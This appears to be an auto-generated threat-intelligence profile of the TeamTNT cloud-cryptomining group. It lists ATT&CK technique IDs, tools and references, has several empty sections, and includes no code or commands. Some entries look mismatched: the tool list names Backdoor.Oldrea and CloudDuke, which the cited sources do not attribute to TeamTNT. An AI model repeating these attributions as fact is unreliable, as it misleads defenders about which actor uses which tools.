Introduction
TeamTNT is a threat group that has primarily targeted cloud and containerized environments. The group as been active since at least October 2019 and has mainly focused its efforts on leveraging cloud and container resources to deploy cryptocurrency miners in victim environments. Palo Alto Black-T October 2020 Lacework TeamTNT May 2021 Intezer TeamTNT September 2020 Cado Security TeamTNT Worm August 2020 Unit 42 Hildegard Malware Trend Micro TeamTNT ATT TeamTNT Chimaera September 2020 Aqua TeamTNT August 2020 Intezer TeamTNT Explosion September 2021
Activities and Tactics
Information pending cataloguing.
Notable Campaigns
Information pending cataloguing.
Tactics, Techniques, and Procedures (TTPs)
- T1680 Local Storage Discovery
- T1686 Disable or Modify System Firewall
- T1133 External Remote Services
- T1219 Remote Access Tools
- T1569.003 Systemctl
- T1036.005 Match Legitimate Resource Name or Location
- T1222.002 Linux and Mac Permissions
- T1070.004 File Deletion
- T1609 Container Administration Command
- T1059.004 Unix Shell
- T1547.001 Registry Run Keys / Startup Folder
- T1543.002 Systemd Service
- T1136.001 Local Account
- T1007 System Service Discovery
- T1049 System Network Connections Discovery
- T1543.003 Windows Service
- T1608.001 Upload Malware
- T1059.003 Windows Command Shell
- T1610 Deploy Container
- T1613 Container and Resource Discovery
- T1048 Exfiltration Over Alternative Protocol
- T1057 Process Discovery
- T1059.001 PowerShell
- T1552.005 Cloud Instance Metadata API
- T1070.003 Clear Command History
- T1074.001 Local Data Staging
- T1595.002 Vulnerability Scanning
- T1059.013 Container CLI/API
- T1027.002 Software Packing
- T1204.003 Malicious Image
- T1014 Rootkit
- T1552.004 Private Keys
- T1611 Escape to Host
- T1595.001 Scanning IP Blocks
- T1105 Ingress Tool Transfer
- T1518.001 Security Software Discovery
- T1496.001 Compute Hijacking
- T1083 File and Directory Discovery
- T1021.004 SSH
- T1036 Masquerading
- T1140 Deobfuscate/Decode Files or Information
- T1082 System Information Discovery
- T1027.013 Encrypted/Encoded File
- T1016 System Network Configuration Discovery
- T1046 Network Service Discovery
- T1120 Peripheral Device Discovery
- T1685 Disable or Modify Tools
- T1071 Application Layer Protocol
- T1098.004 SSH Authorized Keys
- T1583.001 Domains
- T1059.009 Cloud API
- T1071.001 Web Protocols
- T1552.001 Credentials In Files
- T1685.006 Clear Linux or Mac System Logs
- T1587.001 Malware
- T1102 Web Service
ATT&CK technique IDs (denormalized)
- T1007
- T1014
- T1016
- T1021.004
- T1027.002
- T1027.013
- T1036
- T1036.005
- T1046
- T1048
- T1049
- T1057
- T1059.001
- T1059.003
- T1059.004
- T1059.009
- T1059.013
- T1070.003
- T1070.004
- T1071
- T1071.001
- T1074.001
- T1082
- T1083
- T1098.004
- T1102
- T1105
- T1120
- T1133
- T1136.001
- T1140
- T1204.003
- T1219
- T1222.002
- T1496.001
- T1518.001
- T1543.002
- T1543.003
- T1547.001
- T1552.001
- T1552.004
- T1552.005
- T1569.003
- T1583.001
- T1587.001
- T1595.001
- T1595.002
- T1608.001
- T1609
- T1610
- T1611
- T1613
- T1680
- T1685
- T1685.006
- T1686
Notable Indicators of Compromise (IOCs)
No curated IOCs are currently published for this actor. This section will be updated when stable, attributable indicators are available.
Malware and Tools
- Backdoor.Oldrea
- CloudDuke
- Unknown Logger
- Xploit
MITRE ATT&CK Software
- Peirates (S0683) β tool
- MimiPenguin (S0179) β tool
- LaZagne (S0349) β tool
- Hildegard (S0601) β malware
Attribution and Evidence
Information pending cataloguing.
References
[1] mitre-attack [2] ATT TeamTNT Chimaera September 2020 AT&T Alien Labs. (2021, September 8). TeamTNT with new campaign aka Chimaera. Retrieved September 22, 2021. [3] Cado Security TeamTNT Worm August 2020 Cado Security. (2020, August 16). Team TNT β The First Crypto-Mining Worm to Steal AWS Credentials. Retrieved September 22, 2021. [4] Unit 42 Hildegard Malware Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021. [5] Trend Micro TeamTNT Fiser, D. Oliveira, A. (n.d.). Tracking the Activities of TeamTNT A Closer Look at a Cloud-Focused Malicious Actor Group. Retrieved September 22, 2021. [6] Intezer TeamTNT September 2020 Fishbein, N. (2020, September 8). Attackers Abusing Legitimate Cloud Monitoring Tools to Conduct Cyber Attacks. Retrieved September 22, 2021. [7] Intezer TeamTNT Explosion September 2021 Intezer. (2021, September 1). TeamTNT Cryptomining Explosion. Retrieved October 15, 2021. [8] Aqua TeamTNT August 2020 Kol, Roi. Morag, A. (2020, August 25). Deep Analysis of TeamTNT Techniques Using Container Images to Attack. Retrieved September 22, 2021. [9] Palo Alto Black-T October 2020 Quist, N. (2020, October 5). Black-T: New Cryptojacking Variant from TeamTNT. Retrieved September 22, 2021. [10] Lacework TeamTNT May 2021 Stroud, J. (2021, May 25). Taking TeamTNTβs Docker Images Offline. Retrieved September 16, 2024.